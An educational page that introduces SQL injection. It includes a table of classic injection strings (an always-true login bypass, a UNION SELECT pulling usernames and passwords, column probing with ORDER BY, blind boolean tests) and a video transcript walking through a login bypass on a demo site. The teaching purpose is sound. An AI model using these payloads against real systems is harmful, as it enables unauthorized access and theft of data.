SQL Injection Guide

What is SQL Injection?

SQL Injection is a type of cyber attack that targets databases through malicious SQL code. It occurs when an attacker exploits vulnerabilities in a website's input fields, such as login forms or search bars, to inject unauthorized SQL commands. These commands can manipulate the database, allowing the attacker to access, modify, or delete sensitive data. SQL Injection is one of the most common and dangerous web application vulnerabilities, often resulting from improper input validation or insecure coding practices.

Diagram showing SQL injection process

Capabilities of SQL Injection

If an attacker successfully performs an SQL Injection, they can gain significant control over the database. This includes the ability to extract sensitive information like usernames, passwords, credit card details, or personal data. In more severe cases, attackers can modify or delete database records, disrupt website functionality, or even gain administrative access to the entire system. Additionally, SQL Injection can be used as a stepping stone for further attacks, such as deploying malware or compromising other parts of the network. The consequences can be devastating, leading to data breaches, financial losses, and reputational damage for the affected organization.

Example of SQL code vulnerability
Táblázat részletes leírása (kattints a megnyitáshoz)
SQL Injection példák: Ez a táblázat bemutatja a leggyakoribb SQL Injection technikákat, azok leírását és példa SQL kódokat.

Common SQL Injection Examples

Attack String Description Example Query
' OR '1'='1' -- The attacker enters ' OR '1'='1' -- into a login form. This modifies the SQL query to always return TRUE, bypassing authentication SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = '';
' UNION SELECT username, password FROM users -- The UNION statement allows an attacker to append another query to extract data from another table (e.g., users). SELECT id, name FROM products WHERE id = '' UNION SELECT username, password FROM users --';
' ORDER BY 5 -- The attacker inputs ' ORDER BY 5 -- to find the number of columns in a table. If column 5 does not exist, the database returns an error, revealing information about the structure SELECT id, name FROM products WHERE id = '' ORDER BY 5 --';
' AND 1=1 – ' AND 1=1 -- Used when the database does not return errors or visible results. The attacker tests conditions (1=1 returns true, 1=0 returns false). By observing page behavior (e.g., different response times), the attacker can infer information. SELECT * FROM users WHERE username = 'admin' AND password = '' AND 1=1 --';
Show Video Transcript

Welcome to the Hacksplaining video tutorial series. In this video, we will learn about SQL injection, one of the most common and dangerous methods hackers use to attack your website. [Opens bank website] This is the vulnerable application that we are trying to hack using a SQL injection attack. [Zooms in on logs] Here are the application logs. Watch what happens when we interact with the vulnerable application. First, let's try guessing the password. [Types in password and email] Okay, so guessing the password did not work. Let's try adding a quote character after the password. [Types password again with quote] The application crashed with an unexpected error. What could that mean? The logs show a SQL syntax error. This indicates that the quote character disrupted the query in an unexpected way. [Zooms in on SQL code] This is what the application code looks like behind the scenes. Watch how the SQL code gets built when we enter the login details. Let's enter the password with the trailing quote character once more. [Types in password again] The quote is inserted directly into the SQL string and terminates the query early. This is what causes the syntax error we saw in the logs. This behavior indicates that the application might be vulnerable to SQL injection. Let's try a specifically crafted password. [Types in password] And we are in. [Website logs the user in] We successfully gained access to the application without having to guess the password by using SQL injection. The double dashes caused the database to ignore the rest of the SQL statement, allowing us to be authenticated without having to supply the real password. SQL injection is one of the most prevalent vulnerabilities on the internet. If you only have time to protect against one vulnerability, you should be checking for SQL injection in your codebase. Click on the link to learn how to protect yourself, or move on to the next video.